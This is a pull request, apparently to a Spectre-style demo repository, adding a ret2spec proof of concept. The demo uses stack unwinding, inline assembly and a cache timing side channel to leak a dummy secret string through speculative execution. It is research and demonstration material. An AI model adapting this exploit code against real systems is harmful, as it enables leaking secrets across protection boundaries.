### PR TITLE
Ret2spec prototype.

### DIFF
--- a/demos/README.md
+++ b/demos/README.md
@@ -20,7 +20,7 @@ g++ -O2 spectre_v4.cc cache_sidechannel.cc instr.cc -o spectre_v4
 ./spectre_v4
 
 # Ret2spec
-g++ -O2 ret2spec.cc cache_sidechannel.cc instr.cc -o ret2spec
+g++ -O2 -fomit-frame-pointer ret2spec.cc cache_sidechannel.cc instr.cc -o ret2spec
 ./ret2spec
 ```
 

--- a/demos/README.md
+++ b/demos/README.md
@@ -18,6 +18,10 @@ sudo ./meltdown
 # Spectre V4 -- speculative store bypass
 g++ -O2 spectre_v4.cc cache_sidechannel.cc instr.cc -o spectre_v4
 ./spectre_v4
+
+# Ret2spec
+g++ -O2 ret2spec.cc cache_sidechannel.cc instr.cc -o ret2spec
+./ret2spec
 ```
 
 ## Tested environments

--- a/demos/cache_sidechannel.cc
+++ b/demos/cache_sidechannel.cc
@@ -117,7 +117,6 @@ std::pair<bool, char> CacheSideChannel::RecomputeScores(
 
 std::pair<bool, char> CacheSideChannel::AddHitAndRecomputeScores() {
   static size_t additional_offset_counter = 0;
-  // Resulting char is between ASCII code 0 and 127.
   size_t mixed_i = ((additional_offset_counter * 167) + 13) & 0xFF;
   ForceRead(&GetOracle()[mixed_i]);
   additional_offset_counter = (additional_offset_counter + 1) % 256;

--- a/demos/cache_sidechannel.cc
+++ b/demos/cache_sidechannel.cc
@@ -93,7 +93,7 @@ std::pair<bool, char> CacheSideChannel::RecomputeScores(
   int hitcount = 0;
   for (size_t i = 0; i < 256; ++i) {
     if (latencies[i] < median_latency - hitmiss_diff / 2 &&
-        i != safe_offset_char) {
+        i != static_cast<size_t>(safe_offset_char)) {
       ++hitcount;
     }
   }
@@ -103,7 +103,7 @@ std::pair<bool, char> CacheSideChannel::RecomputeScores(
   if (hitcount == 1) {
     for (size_t i = 0; i < 256; ++i) {
       if (latencies[i] < median_latency - hitmiss_diff / 2 &&
-          i != safe_offset_char) {
+          i != static_cast<size_t>(safe_offset_char)) {
         ++scores_[i];
       }
     }

--- a/demos/cache_sidechannel.cc
+++ b/demos/cache_sidechannel.cc
@@ -89,7 +89,8 @@ std::pair<bool, char> CacheSideChannel::RecomputeScores(
   // different across platforms. Therefore we must first compute its estimate
   // using the safe_offset_char which should be a cache-hit.
   uint64_t hitmiss_diff = median_latency - latencies[
-      static_cast<size_t>(safe_offset_char)];
+      static_cast<size_t>(static_cast<unsigned char>(safe_offset_char))];
+
   int hitcount = 0;
   for (size_t i = 0; i < 256; ++i) {
     if (latencies[i] < median_latency - hitmiss_diff / 2 &&
@@ -117,7 +118,7 @@ std::pair<bool, char> CacheSideChannel::RecomputeScores(
 std::pair<bool, char> CacheSideChannel::AddHitAndRecomputeScores() {
   static size_t additional_offset_counter = 0;
   // Resulting char is between ASCII code 0 and 127.
-  size_t mixed_i = ((additional_offset_counter * 167) + 13) & 0x7F;
+  size_t mixed_i = ((additional_offset_counter * 167) + 13) & 0xFF;
   ForceRead(&GetOracle()[mixed_i]);
   additional_offset_counter = (additional_offset_counter + 1) % 256;
   return RecomputeScores(static_cast<char>(mixed_i));

--- a/demos/cache_sidechannel.cc
+++ b/demos/cache_sidechannel.cc
@@ -51,7 +51,8 @@ void CacheSideChannel::FlushOracle() const {
   }
 }
 
-std::pair<bool, char> CacheSideChannel::RecomputeScores(char safe_offset_char) {
+std::pair<bool, char> CacheSideChannel::RecomputeScores(
+    char safe_offset_char) {
   std::array<uint64_t, 256> latencies = {};
   size_t best_val = 0, runner_up_val = 0;
 
@@ -59,11 +60,11 @@ std::pair<bool, char> CacheSideChannel::RecomputeScores(char safe_offset_char) {
   // latency. Indexing into isolated_oracle causes the relevant region of
   // memory to be loaded into cache, which makes it faster to load again than
   // it is to load entries that had not been accessed.
-  // Only two offsets will have been accessed: safe_offset (which we ignore),
-  // and i.
-  // Note: if the character at safe_offset is the same as the character we
+  // Only two offsets will have been accessed: safe_offset_char (which we
+  // ignore), and i.
+  // Note: if the character at safe_offset_char is the same as the character we
   // want to know at i, the data from this run will be useless, but later runs
-  // will use a different safe_offset.
+  // will use a different safe_offset_char.
   for (size_t i = 0; i < 256; ++i) {
     // Some CPUs (e.g. AMD Ryzen 5 PRO 2400G) prefetch cache lines, rendering
     // them all equally fast. Therefore it is necessary to confuse them by
@@ -86,12 +87,13 @@ std::pair<bool, char> CacheSideChannel::RecomputeScores(char safe_offset_char) {
 
   // The difference between a cache-hit and cache-miss times is significantly
   // different across platforms. Therefore we must first compute its estimate
-  // using the safe_offset which should be a cache-hit.
-  uint64_t hitmiss_diff = median_latency - latencies[safe_offset_char];
+  // using the safe_offset_char which should be a cache-hit.
+  uint64_t hitmiss_diff = median_latency - latencies[
+      static_cast<size_t>(safe_offset_char)];
   int hitcount = 0;
   for (size_t i = 0; i < 256; ++i) {
     if (latencies[i] < median_latency - hitmiss_diff / 2 &&
-        i != static_cast<size_t>(safe_offset_char)) {
+        i != safe_offset_char) {
       ++hitcount;
     }
   }
@@ -101,7 +103,7 @@ std::pair<bool, char> CacheSideChannel::RecomputeScores(char safe_offset_char) {
   if (hitcount == 1) {
     for (size_t i = 0; i < 256; ++i) {
       if (latencies[i] < median_latency - hitmiss_diff / 2 &&
-          i != static_cast<size_t>(safe_offset_char)) {
+          i != safe_offset_char) {
         ++scores_[i];
       }
     }
@@ -110,4 +112,13 @@ std::pair<bool, char> CacheSideChannel::RecomputeScores(char safe_offset_char) {
   std::tie(best_val, runner_up_val) = top_two_indices(scores_);
   return std::make_pair((scores_[best_val] > 2 * scores_[runner_up_val] + 40),
                         best_val);
+}
+
+std::pair<bool, char> CacheSideChannel::AddHitAndRecomputeScores() {
+  static size_t additional_offset_counter = 0;
+  // Resulting char is between ASCII code 0 and 127.
+  size_t mixed_i = ((additional_offset_counter * 167) + 13) & 0x7F;
+  ForceRead(&GetOracle()[mixed_i]);
+  additional_offset_counter = (additional_offset_counter + 1) % 256;
+  return RecomputeScores(static_cast<char>(mixed_i));
 }

--- a/demos/cache_sidechannel.h
+++ b/demos/cache_sidechannel.h
@@ -93,6 +93,9 @@ class CacheSideChannel {
   // character. Otherwise it returns false and any character that has the
   // highest score.
   std::pair<bool, char> RecomputeScores(char safe_offset_char);
+  // Adds an artifical cache-hit and recompute scores. Useful for demonstration
+  // that do not have natural architectural cache-hits.
+  std::pair<bool, char> AddHitAndRecomputeScores();
 
  private:
   // Oracle array cannot be allocated for stack because MSVC stack size is 1MB,

--- a/demos/instr.cc
+++ b/demos/instr.cc
@@ -114,3 +114,49 @@ uint64_t ReadLatency(const void *memory) {
   LFence();  // Necessary for x86 MSVC.
   return result;
 }
+
+#ifdef __GNUC__
+__attribute__((noinline))
+void UnwindStackAndSlowlyReturnTo(const void *address) {
+  asm volatile(
+#if defined(__x86_64__) || defined(_M_X64)
+      "addq $8, %%rsp\n"
+      "popstack:\n"
+      "addq $8, %%rsp\n"
+      "cmpq %0, (%%rsp)\n"
+      "jnz popstack\n"
+      "clflush (%%rsp)\n"
+      "mfence\n"
+      "lfence\n"
+      "ret\n"::"r"(address));
+#elif defined(__i386__) || defined(_M_IX86)
+      "addl $4, %%esp\n"
+      "popstack:\n"
+      "addl $4, %%esp\n"
+      "cmpl %0, (%%esp)\n"
+      "jnz popstack\n"
+      "clflush (%%esp)\n"
+      "mfence\n"
+      "lfence\n"
+      "ret\n"::"r"(address));
+#elif defined(__aarch64__)
+      // Unwind until the magic value and pop the magic value.
+      "movz x9, 0x4567\n"
+      "movk x9, 0x0123, lsl 16\n"
+      "movk x9, 0xba98, lsl 32\n"
+      "movk x9, 0xfedc, lsl 48\n"
+      "popstack:\n"
+      "ldr x10, [sp], #16\n"
+      "cmp x9, x10\n"
+      "bne popstack\n"
+      // Load the return address slowly from the stack and return.
+      "mov x11, sp\n"
+      "dc civac, x11\n"
+      "dsb sy\n"
+      "ldr x30, [sp], #16\n"
+      "ret\n");
+#else
+#  error Unsupported CPU.
+#endif
+#endif
+}

--- a/demos/instr.cc
+++ b/demos/instr.cc
@@ -162,5 +162,5 @@ void UnwindStackAndSlowlyReturn() {
 #else
 #  error Unsupported CPU.
 #endif
-#endif
 }
+#endif

--- a/demos/instr.cc
+++ b/demos/instr.cc
@@ -118,8 +118,8 @@ uint64_t ReadLatency(const void *memory) {
 #ifdef __GNUC__
 __attribute__((noinline))
 void UnwindStackAndSlowlyReturnTo(const void *address) {
-  asm volatile(
 #if defined(__x86_64__) || defined(_M_X64)
+  asm volatile(
       "addq $8, %%rsp\n"
       "popstack:\n"
       "addq $8, %%rsp\n"
@@ -128,7 +128,9 @@ void UnwindStackAndSlowlyReturnTo(const void *address) {
       "clflush (%%rsp)\n"
       "mfence\n"
       "lfence\n"
+      "ret\n"::"r"(address));
 #elif defined(__i386__) || defined(_M_IX86)
+  asm volatile(
       "addl $4, %%esp\n"
       "popstack:\n"
       "addl $4, %%esp\n"
@@ -137,7 +139,9 @@ void UnwindStackAndSlowlyReturnTo(const void *address) {
       "clflush (%%esp)\n"
       "mfence\n"
       "lfence\n"
+      "ret\n"::"r"(address));
 #elif defined(__aarch64__)
+  asm volatile(
       // Unwind until the magic value and pop the magic value.
       "movz x9, 0x4567\n"
       "movk x9, 0x0123, lsl 16\n"
@@ -154,9 +158,9 @@ void UnwindStackAndSlowlyReturnTo(const void *address) {
       "dc civac, x11\n"
       "dsb sy\n"
       "ldr x30, [sp], #16\n"
+      "ret\n"::"r"(address));
 #else
 #  error Unsupported CPU.
 #endif
-      "ret\n"::"r"(address));
 }
 #endif

--- a/demos/instr.cc
+++ b/demos/instr.cc
@@ -117,9 +117,9 @@ uint64_t ReadLatency(const void *memory) {
 
 #ifdef __GNUC__
 __attribute__((noinline))
-#if defined(__x86_64__) || defined(_M_X64)
 void UnwindStackAndSlowlyReturnTo(const void *address) {
   asm volatile(
+#if defined(__x86_64__) || defined(_M_X64)
       "addq $8, %%rsp\n"
       "popstack:\n"
       "addq $8, %%rsp\n"
@@ -128,10 +128,7 @@ void UnwindStackAndSlowlyReturnTo(const void *address) {
       "clflush (%%rsp)\n"
       "mfence\n"
       "lfence\n"
-      "ret\n"::"r"(address));
 #elif defined(__i386__) || defined(_M_IX86)
-void UnwindStackAndSlowlyReturnTo(const void *address) {
-  asm volatile(
       "addl $4, %%esp\n"
       "popstack:\n"
       "addl $4, %%esp\n"
@@ -140,10 +137,7 @@ void UnwindStackAndSlowlyReturnTo(const void *address) {
       "clflush (%%esp)\n"
       "mfence\n"
       "lfence\n"
-      "ret\n"::"r"(address));
 #elif defined(__aarch64__)
-void UnwindStackAndSlowlyReturn() {
-  asm volatile(
       // Unwind until the magic value and pop the magic value.
       "movz x9, 0x4567\n"
       "movk x9, 0x0123, lsl 16\n"
@@ -153,14 +147,16 @@ void UnwindStackAndSlowlyReturn() {
       "ldr x10, [sp], #16\n"
       "cmp x9, x10\n"
       "bne popstack\n"
-      // Load the return address slowly from the stack and return.
+      // Push the return address on the stack.
+      // Pop the return address slowly from the stack and return.
+      "str %0, [sp, #-16]!\n"
       "mov x11, sp\n"
       "dc civac, x11\n"
       "dsb sy\n"
       "ldr x30, [sp], #16\n"
-      "ret\n");
 #else
 #  error Unsupported CPU.
 #endif
+      "ret\n"::"r"(address));
 }
 #endif

--- a/demos/instr.cc
+++ b/demos/instr.cc
@@ -117,9 +117,9 @@ uint64_t ReadLatency(const void *memory) {
 
 #ifdef __GNUC__
 __attribute__((noinline))
+#if defined(__x86_64__) || defined(_M_X64)
 void UnwindStackAndSlowlyReturnTo(const void *address) {
   asm volatile(
-#if defined(__x86_64__) || defined(_M_X64)
       "addq $8, %%rsp\n"
       "popstack:\n"
       "addq $8, %%rsp\n"
@@ -130,6 +130,8 @@ void UnwindStackAndSlowlyReturnTo(const void *address) {
       "lfence\n"
       "ret\n"::"r"(address));
 #elif defined(__i386__) || defined(_M_IX86)
+void UnwindStackAndSlowlyReturnTo(const void *address) {
+  asm volatile(
       "addl $4, %%esp\n"
       "popstack:\n"
       "addl $4, %%esp\n"
@@ -140,6 +142,8 @@ void UnwindStackAndSlowlyReturnTo(const void *address) {
       "lfence\n"
       "ret\n"::"r"(address));
 #elif defined(__aarch64__)
+void UnwindStackAndSlowlyReturn() {
+  asm volatile(
       // Unwind until the magic value and pop the magic value.
       "movz x9, 0x4567\n"
       "movk x9, 0x0123, lsl 16\n"

--- a/demos/instr.cc
+++ b/demos/instr.cc
@@ -148,8 +148,8 @@ void UnwindStackAndSlowlyReturnTo(const void *address) {
       "cmp x9, x10\n"
       "bne popstack\n"
       // Push the return address on the stack.
-      // Pop the return address slowly from the stack and return.
       "str %0, [sp, #-16]!\n"
+      // Pop the return address slowly from the stack and return.
       "mov x11, sp\n"
       "dc civac, x11\n"
       "dsb sy\n"

--- a/demos/instr.h
+++ b/demos/instr.h
@@ -16,8 +16,9 @@
 
 #include <cstdint>
 
-// Label defined in inline assembly. Used to pass return address as a function
-// argument.
+// Label defined in inline assembly. Used to pass addresses for the instruction
+// pointer or program counter registers - either as return addresses (ret2spec)
+// or for skipping failures in signal handlers (meltdown).
 extern char afterspeculation[];
 
 // Forced memory load.

--- a/demos/instr.h
+++ b/demos/instr.h
@@ -24,3 +24,45 @@ void CLFlush(const void *memory);
 
 // Measures the latency of memory read from a given address
 uint64_t ReadLatency(const void *memory);
+
+asm(
+#if defined(__i386__) || defined(__x86_64__) || defined(_M_X64) || \
+    defined(_M_IX86)
+    // Assembler macros for the backup and restore of registers.
+    ".macro BACKUP_REGISTERS\n"
+    "pushq %rax\n"
+    "pushq %rbx\n"
+    "pushq %rcx\n"
+    "pushq %rdx\n"
+    "pushq %rbp\n"
+    "pushq %rsi\n"
+    "pushq %rdi\n"
+    "pushq %r8\n"
+    "pushq %r9\n"
+    "pushq %r10\n"
+    "pushq %r11\n"
+    "pushq %r12\n"
+    "pushq %r13\n"
+    "pushq %r14\n"
+    "pushq %r15\n"
+    ".endm\n"
+
+    ".macro RESTORE_REGISTERS\n"
+    "popq %r15\n"
+    "popq %r14\n"
+    "popq %r13\n"
+    "popq %r12\n"
+    "popq %r11\n"
+    "popq %r10\n"
+    "popq %r9\n"
+    "popq %r8\n"
+    "popq %rdi\n"
+    "popq %rsi\n"
+    "popq %rbp\n"
+    "popq %rdx\n"
+    "popq %rcx\n"
+    "popq %rbx\n"
+    "popq %rax\n"
+    ".endm\n"
+#endif
+);

--- a/demos/instr.h
+++ b/demos/instr.h
@@ -16,12 +16,6 @@
 
 #include <cstdint>
 
-// Label defined in inline assembly. Used to define addresses for the
-// instruction pointer or program counter registers - either as return
-// addresses (ret2spec) or for skipping failures in signal handlers
-// (meltdown).
-extern char afterspeculation[];
-
 // Forced memory load.
 void ForceRead(const void *p);
 
@@ -36,7 +30,15 @@ uint64_t ReadLatency(const void *memory);
 // returns.
 void UnwindStackAndSlowlyReturnTo(const void *address);
 
-#if defined(__aarch64__)
+#if defined(__i386__) || defined(__x86_64__) || defined(_M_X64) || \
+    defined(_M_IX86)
+// Label defined in inline assembly. Used to define addresses for the
+// instruction pointer or program counter registers - either as return
+// addresses (ret2spec) or for skipping failures in signal handlers
+// (meltdown).
+extern char afterspeculation[];
+
+#elif defined(__aarch64__)
 // Push callee-saved registers and return address on stack and mark it with
 // magic value.
 __attribute__((always_inline))

--- a/demos/instr.h
+++ b/demos/instr.h
@@ -26,10 +26,10 @@ void CLFlush(const void *memory);
 uint64_t ReadLatency(const void *memory);
 
 asm(
+// Assembler macros for the backup and restore of general purpose registers.
+    ".macro BACKUP_REGISTERS\n"
 #if defined(__i386__) || defined(__x86_64__) || defined(_M_X64) || \
     defined(_M_IX86)
-    // Assembler macros for the backup and restore of registers.
-    ".macro BACKUP_REGISTERS\n"
     "pushq %rax\n"
     "pushq %rbx\n"
     "pushq %rcx\n"
@@ -45,9 +45,32 @@ asm(
     "pushq %r13\n"
     "pushq %r14\n"
     "pushq %r15\n"
+#elif defined(__aarch64__)
+    "stp x0, x1, [sp, #-16]!\n"
+    "stp x2, x3, [sp, #-16]!\n"
+    "stp x4, x5, [sp, #-16]!\n"
+    "stp x6, x7, [sp, #-16]!\n"
+    "stp x8, x9, [sp, #-16]!\n"
+    "stp x10, x11, [sp, #-16]!\n"
+    "stp x12, x13, [sp, #-16]!\n"
+    "stp x14, x15, [sp, #-16]!\n"
+    "stp x16, x17, [sp, #-16]!\n"
+    "stp x18, x19, [sp, #-16]!\n"
+    "stp x20, x21, [sp, #-16]!\n"
+    "stp x22, x23, [sp, #-16]!\n"
+    "stp x24, x25, [sp, #-16]!\n"
+    "stp x26, x27, [sp, #-16]!\n"
+    "stp x28, x29, [sp, #-16]!\n"
+#elif defined(__powerpc__)
+
+#else
+#  error Unsupported CPU.
+#endif
     ".endm\n"
 
     ".macro RESTORE_REGISTERS\n"
+#if defined(__i386__) || defined(__x86_64__) || defined(_M_X64) || \
+    defined(_M_IX86)
     "popq %r15\n"
     "popq %r14\n"
     "popq %r13\n"
@@ -63,6 +86,26 @@ asm(
     "popq %rcx\n"
     "popq %rbx\n"
     "popq %rax\n"
-    ".endm\n"
+#elif defined(__aarch64__)
+    "ldp x28, x29, [sp], #16\n"
+    "ldp x26, x27, [sp], #16\n"
+    "ldp x24, x25, [sp], #16\n"
+    "ldp x22, x23, [sp], #16\n"
+    "ldp x20, x21, [sp], #16\n"
+    "ldp x18, x19, [sp], #16\n"
+    "ldp x16, x17, [sp], #16\n"
+    "ldp x14, x15, [sp], #16\n"
+    "ldp x12, x13, [sp], #16\n"
+    "ldp x10, x11, [sp], #16\n"
+    "ldp x8, x9, [sp], #16\n"
+    "ldp x6, x7, [sp], #16\n"
+    "ldp x4, x5, [sp], #16\n"
+    "ldp x2, x3, [sp], #16\n"
+    "ldp x0, x1, [sp], #16\n"
+#elif defined(__powerpc__)
+
+#else
+#  error Unsupported CPU.
 #endif
+    ".endm\n"
 );

--- a/demos/meltdown.cc
+++ b/demos/meltdown.cc
@@ -72,8 +72,8 @@ static char leak_byte(const char *data, size_t offset) {
     // architecturally and kernel sends SIGSEGV instead.
     ForceRead(&isolated_oracle[static_cast<size_t>(data[offset])]);
 
-    // SIGSEGV signal handler moves the instruction pointer to the following
-    // label.
+    // Inlines the afterspeculation label. SIGSEGV signal handler moves the
+    // instruction pointer to that label.
     afterspeculate();
 
     std::pair<bool, char> result =

--- a/demos/meltdown.cc
+++ b/demos/meltdown.cc
@@ -43,10 +43,6 @@
 // stored only in the kernel memory.
 const char *public_data = "Hello, world!";
 
-// This label is used for shifting the instruction pointer after the instruction
-// that caused SIGSEGV. It is defined in the inlined assembler.
-extern char afterspeculation [];
-
 // Leaks the byte that is physically located at &text[0] + offset, without
 // really loading it. In the abstract machine, and in the code executed by the
 // CPU, this function does not load any memory except for what is in the bounds

--- a/demos/meltdown.cc
+++ b/demos/meltdown.cc
@@ -74,7 +74,7 @@ static char leak_byte(const char *data, size_t offset) {
 
     // SIGSEGV signal handler moves the instruction pointer to the following
     // label.
-    asm volatile("afterspeculation:");
+    afterspeculate();
 
     std::pair<bool, char> result =
         sidechannel.RecomputeScores(data[safe_offset]);

--- a/demos/meltdown.cc
+++ b/demos/meltdown.cc
@@ -72,9 +72,8 @@ static char leak_byte(const char *data, size_t offset) {
     // architecturally and kernel sends SIGSEGV instead.
     ForceRead(&isolated_oracle[static_cast<size_t>(data[offset])]);
 
-    // Inlines the afterspeculation label. SIGSEGV signal handler moves the
-    // instruction pointer to that label.
-    afterspeculate();
+    // SIGSEGV signal handler moves the instruction pointer to this label.
+    asm volatile("afterspeculation:");
 
     std::pair<bool, char> result =
         sidechannel.RecomputeScores(data[safe_offset]);

--- a/demos/ret2spec.cc
+++ b/demos/ret2spec.cc
@@ -61,7 +61,6 @@ void speculation(const char *data, size_t offset,
   ForceRead(&isolated_oracle[static_cast<size_t>(data[offset])]);
   std::cout << "If this is printed, it signifies a fatal error. "
             << "This print statement is architecturally dead." << std::endl;
-  exit(EXIT_FAILURE);
 }
 
 static char leak_byte(const char *data, size_t offset) {

--- a/demos/ret2spec.cc
+++ b/demos/ret2spec.cc
@@ -1,0 +1,125 @@
+/*
+ * Copyright 2019 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *   https://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <algorithm>
+#include <array>
+#include <cstring>
+#include <iostream>
+#include <string>
+#include <tuple>
+#include <vector>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+
+// TODO(asteinha) Make this work with ICC.
+// TODO(asteinha) Implement support for MSVC and Windows.
+// TODO(asteinha) Investigate the exploitability of ARM64 and PowerPC.
+
+// Objective: given some control over accesses to the *non-secret* string
+// "Hello, world!", construct a program that obtains "It's a s3kr3t!!!" without
+// ever accessing it in the C++ execution model, using speculative execution
+// and side channel attacks
+const char *public_data = "Hello, world!";
+const char *private_data = "It's a s3kr3t!!!";
+extern char afterspeculation[];
+
+// Take the "afterspeculation" label address, push in on the stack and return
+// to it.
+__attribute__((noinline))
+void escape() {
+  asm volatile(
+      "pushq %0\n"
+      "clflush (%%rsp)\n"
+      "mfence\n"
+      "lfence\n"
+      "ret\n"::"r"(afterspeculation));
+}
+
+// Call the "escape" function which smashes the stack jumping back to the
+// "afterspeculation" label in the "leak_byte" function never executing the
+// code that follows the "escape" call in the "speculate" method.
+__attribute__((noinline))
+void speculation(const char *data, size_t offset,
+                 const std::array<BigByte, 256> &isolated_oracle) {
+  escape(); // Never returns
+
+  // Architecturally dead code. Never reached.
+  ForceRead(&isolated_oracle[static_cast<size_t>(data[offset])]);
+  std::cout << "If this is printed, it signifies a fatal error. "
+            << "This print statement is architecturally dead." << std::endl;
+  exit(EXIT_FAILURE);
+}
+
+static char leak_byte(const char *data, size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
+
+  for (int run = 0;; ++run) {
+    sidechannel.FlushOracle();
+
+    // We pick a different offset every time so that it's guaranteed that the
+    // value of the in-bounds access is usually different from the secret value
+    // we want to leak via out-of-bounds speculative access.
+    size_t safe_offset = run % strlen(data);
+    ForceRead(&isolated_oracle[static_cast<size_t>(data[safe_offset])]);
+
+    // Backup all registers and mark the end of the context backup with the
+    // 0xfedcba9801234567 value.
+    asm volatile(
+        "BACKUP_REGISTERS\n"
+        "movq $0xfedcba9801234567, %rax\n"
+        "pushq %rax\n");
+
+    speculation(data, offset, isolated_oracle);
+
+    // Unwind the stack until we find the 0xfedcba9801234567 value and then
+    // restore all registers.
+    asm volatile(
+        "_afterspeculation:\n" // For MacOS.
+        "afterspeculation:\n" // For Linux.
+        "movq $0xfedcba9801234567, %rax\n"
+        "popq %rbx\n"
+        "cmpq %rbx, %rax\n"
+        "jnz afterspeculation\n"
+        "RESTORE_REGISTERS\n");
+
+    std::pair<bool, char> result =
+        sidechannel.RecomputeScores(data[safe_offset]);
+    if (result.first) {
+      return result.second;
+    }
+
+    if (run > 100000) {
+      std::cerr << "Does not converge " << result.second << std::endl;
+      exit(EXIT_FAILURE);
+    }
+  }
+}
+
+int main() {
+  std::cout << "Leaking the string: ";
+  std::cout.flush();
+  const size_t private_offset = private_data - public_data;
+  for (size_t i = 0; i < strlen(private_data); ++i) {
+    // On at least some machines, this will print the i'th byte from
+    // private_data, despite the only actually-executed memory accesses being
+    // to valid bytes in public_data.
+    std::cout << leak_byte(public_data, private_offset + i);
+    std::cout.flush();
+  }
+  std::cout << "\nDone!\n";
+}

--- a/demos/ret2spec.cc
+++ b/demos/ret2spec.cc
@@ -39,7 +39,13 @@ const std::array<BigByte, 256> *oracle_ptr;
 // Call a "UnwindStackAndSlowlyReturn.." function which unwinds the stack
 // jumping back to the "afterspeculation" label in the "leak_byte" function
 // never executing the code that follows.
+#ifdef _MSC_VER
+__declspec(noinline)
+#elif defined(__GNUC__)
 __attribute__((noinline))
+#else
+#  error Unsupported compiler.
+#endif
 static void speculation() {
 #if defined(__i386__) || defined(__x86_64__) || defined(_M_X64) || \
     defined(_M_IX86)


### PR DESCRIPTION
So far Intel + AMD + ARM, GCC + Clang + ICC, and Linux + MacOS are supported - all supported combinations in this range were tested. Requires at least -O1 optimizations on both GCC and Clang - otherwise it does not work.

Windows might be a bit toilsome, because MSVC does not allow 64bit assembler inlining. ARM64 and PowerPC have different RET instruction mnemonics where the return value is not on the stack, but in a register, so that will require some research to be done.